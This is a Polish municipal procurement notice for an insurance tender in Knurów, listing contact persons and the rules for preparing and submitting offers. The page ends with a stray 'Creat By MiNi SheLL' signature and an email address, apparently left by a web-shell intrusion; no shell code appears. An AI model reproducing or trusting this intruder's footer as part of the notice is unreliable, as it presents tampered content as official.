1) W sprawie procedury przetargowej
 a) Naczelnik Wydziału Zamówień Publicznych - Grażyna Szweda 
 b) Z-ca Naczelnika Wydziału Zamówień Publicznych - Kornelia Loch, 
fax nr: 32 441-97-44, 32 339-22-92 lub 32 235-15-21, albo e-mail: zp@knurow.pl
 2) W sprawach merytorycznych 
 a) Pełnomocnik Zamawiającego (broker ubezpieczeniowy) 
Bożena Sarlej-Kania, tel. 0-32/235-74-99, fax 032/352-02-70 
email: kancelaria@kapitalnybroker.pl
 b) Pełnomocnik Zamawiającego (broker ubezpieczeniowy)
Tomasz Szajbe, tel. 0-32/235-74-99, fax 032/352-02-70
email: kancelaria@kapitalnybroker.pl

Sposób przygotowania oferty
 1. Ofertę należy złożyć na lub wg formularza oferty stanowiącego załącznik do SIWZ.
 2. Treść złożonej oferty musi odpowiadać treści SIWZ. Oferta sporządzona niezgodnie z załącznikami (np: brak pozycji, niezgodności zakresu ochrony ubezpieczeniowej itp.) zostanie odrzucona, jako oferta, której treść nie odpowiada treści specyfikacji istotnych warunków zamówienia (art. 89 ust. 1 pkt 2 ustawy pzp).
 3. Oferta wraz z załącznikami (oświadczeniami i dokumentami) powinna być napisana w języku polskim, w sposób trwały (np. na maszynie, kompute­rze, długopisem lub atramentem) oraz być podpisana przez: wykonawcę (osobę/osoby upoważnione do reprezentowania wykonawcy i za­ciągania zobowiązań w wysokości odpowiadającej ce­nie oferty) lub osobę/osoby posiadające stosowne pełnomocnictwo, z zastrzeżeniem rozdz. VI ust. 6 SIWZ. Pełnomocnictwo powinno być przedłożone w ofercie w formie oryginału lub poświadczonej notarialnie za zgodność z oryginałem kopii.
 4. Każdy wykonawca może złożyć na każdą część tylko jedną ofertę, sam lub jako partner koasekuracji. Wykonawca, który przedkłada więcej niż jedną ofertę spowoduje, że wszystkie oferty z udziałem tego wykonawcy zostaną odrzucone.
 5. Oferta powinna zawierać:
 1) nazwę, siedzibę i dokładny adres wykonawcy(ów), datę sporządzenia oferty oraz adresy kontaktowe (faks, e-mail, telefon),
 2) wypełnione przez wykonawcę następujące formularze:
 a) Formularz oferty, bez względu na fakt czy składa ofertę na część nr I, część nr II, część nr III lub całość - wg wzoru Załącznika nr 11,
 b) Formularz cenowy do części nr I - wg wzoru Załącznika nr 12 i Formularz OWU i szczególnych warunków ubezpieczeń do części nr I - wg wzoru Załącznika nr 13, jeżeli wykonawca składa ofertę do części nr I,
 c) Formularz cenowy do części nr II - wg wzoru Załącznika nr 14 i Formularz OWU i szczególnych warunków ubezpieczeń do części nr II - wg wzoru Załącznika nr 15, jeżeli wykonawca składa ofertę do częśći nr II,
 d) Formularz cenowy do części nr III - wg wzoru Załącznika nr 16 i Formularz OWU i szczególnych warunków ubezpieczeń do części nr III - wg wzoru Załącznika nr 17, jeżeli wykonawca składa ofertę do częśći nr III,
 3) w przypadku, gdy wykonawca składa ofertę na całość, czyli część nr I, część nr II i część nr III, przedkłada wypełnione wszystkie Formularze wskazane powyżej w pkt. 1,
 4) Ogólne Warunki Ubezpieczeń na poszczególne grupy ubezpieczeń mające zastosowanie w przedstawionej ofercie,
 5) oświadczenie o procedurze likwidacji szkód,
 6) oświadczenie dotyczące podwykonawców,
 7) statut towarzystwa w przypadku składania oferty przez Towarzystwa Ubezpieczeń Wzajemnych (statut towarzystwa musi określać, iż Ubezpieczający/Ubezpieczony nie będzie zobowiązany do udziału w pokryciu strat towarzystwa przez wnoszenie dodatkowej składki ubezpieczeniowej jak również innych zobowiązań poza zobowiązaniami wynikającymi z umowy ubezpieczenia),
 8) pełnomocnictwo do reprezentowania wykonawcy w postępowaniu, o ile umocowanie nie wynika z innych dokumentów złożonych wraz z ofertą.
 6. Do oferty należy załączyć oświadczenia i dokumenty wymienione w rozdz. VI SIWZ..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com